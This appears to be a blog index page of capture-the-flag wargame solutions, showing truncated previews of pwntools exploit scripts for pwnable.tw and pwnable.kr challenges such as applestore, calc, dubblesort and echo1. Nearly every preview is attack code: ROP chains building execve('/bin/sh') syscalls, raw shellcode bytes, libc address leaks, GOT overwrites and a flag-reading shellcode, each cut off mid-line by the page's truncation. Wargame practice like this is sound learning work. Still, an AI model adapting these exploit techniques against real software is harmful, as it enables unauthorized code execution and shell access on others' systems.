Wargame (56) 썸네일형 리스트형 [pwnable.tw] applestore 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758from pwn import * def add(n): r.sendlineafter("> ", '2') r.sendlineafter("Number> ", str(n)) r = remote('chall.pwnable.tw', 10104)#r = process("./applestore")e = ELF("./applestore")#libc = ELF("/lib/i386-linux-gnu/libc.so.6")libc = ELF("./libc_32.so.6") for i in range(6): add(1)for i in ran.. [pwnable.tw] orw 1234567891011121314from pwn import * r = remote('chall.pwnable.tw', 10001)context(arch='i386', os='linux') sm = ''sm += shellcraft.open('/home/orw/flag') sm += shellcraft.read(3, 'esp', 50) sm += shellcraft.write(1, 'esp', 50) sm += shellcraft.exit() r.sendlineafter(':', asm(sm)) r.interactive()Colored by Color Scriptercs [pwnable.tw] silver_bullet 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960from pwn import * s = remote('chall.pwnable.tw', 10103)#s = process('./silver_bullet')e = ELF('./silver_bullet')libc = ELF('libc_32.so.6') pr = 0x8048475one = 0x5fbc5 s.sendlineafter('choice :', '1')s.sendafter('bullet :', 'A'*0x2f + '\x00') s.sendlineafter('choice :', '2')s.sendafter('.. [pwnable.tw] dubblesort 12345678910111213141516171819202122232425262728293031from pwn import * s = remote('chall.pwnable.tw', 10101)#s = process('./dubblesort', env={'LD_PRELOAD':'./libc_32.so.6'})#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')libc = ELF('./libc_32.so.6') s.sendlineafter('name :', 'A'*24)s.recvuntil('AAAA\n')base = u32('\x00' + s.recv(3)) - 0x1b0000system = base + libc.symbols['system']binsh = base + n.. [pwnable.tw] calc 123456789101112131415+360+1+361+134595402 #pop_eax (calc function return address)+362-134595399 #3(read syscall num)+363+81545 #pop_edx_ecx_ebx+364-81537 #edx(size) = 8+365+135106815 #ecx(bss)+366-135106815 #0 ebx(fd)+367-428159 #syscall +368+134167244 #pop_eax+369-134167233 #11(execve syscall num)+370+509711 #pop_edx_ecx_ebx+371-509711 #0(edx)+372-509711 #0(ecx)+373+134678641 #bss(ebx)+374+15 #.. [pwnable.kr] md5 calculator 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647from pwn import *from base64 import *from ctypes import *import os libc = CDLL('libc.so.6')#s = process('./hash')s = remote('pwnable.kr', 9002)e = ELF('./hash') pr = 0x08048aa3pppr = 0x0804908bg_buf = 0x804B0E0cmd = "/bin/sh\x00" libc.srand(libc.time(0))random = []calc = 0for i in range(8): random.append(libc.ra.. [pwnable.kr] echo1 12345678910111213141516171819from pwn import * p = remote('pwnable.kr', 9010)context(arch='amd64',os='linux')id_addr = 0x6020a0shell = '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' jmp_rsp = asm('jmp rsp') payload = 'A'*0x28payload += p64(id_addr)payload += shell p.sendlineafter(' : ', jmp_rsp)p.sendlineafter('> ', '1')p.recv(1024).. [pwnable.kr] brain fuck 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from pwn import * #p = process('./bf')p = remote('pwnable.kr',9001)#e = ELF('/lib/i386-linux-gnu/libc-2.23.so')e = ELF('./bf_libc.so') point = 0x804a0a0pnum = 0memset_got = 0x804a02cfgets_got = 0x804a010putchar_got = 0x804a030 pnum = point - fgets_gotpoint -= pnumpayload = '' * 4payload += '' * 4payloa.. 이전 1 2 3 4 ··· 7 다음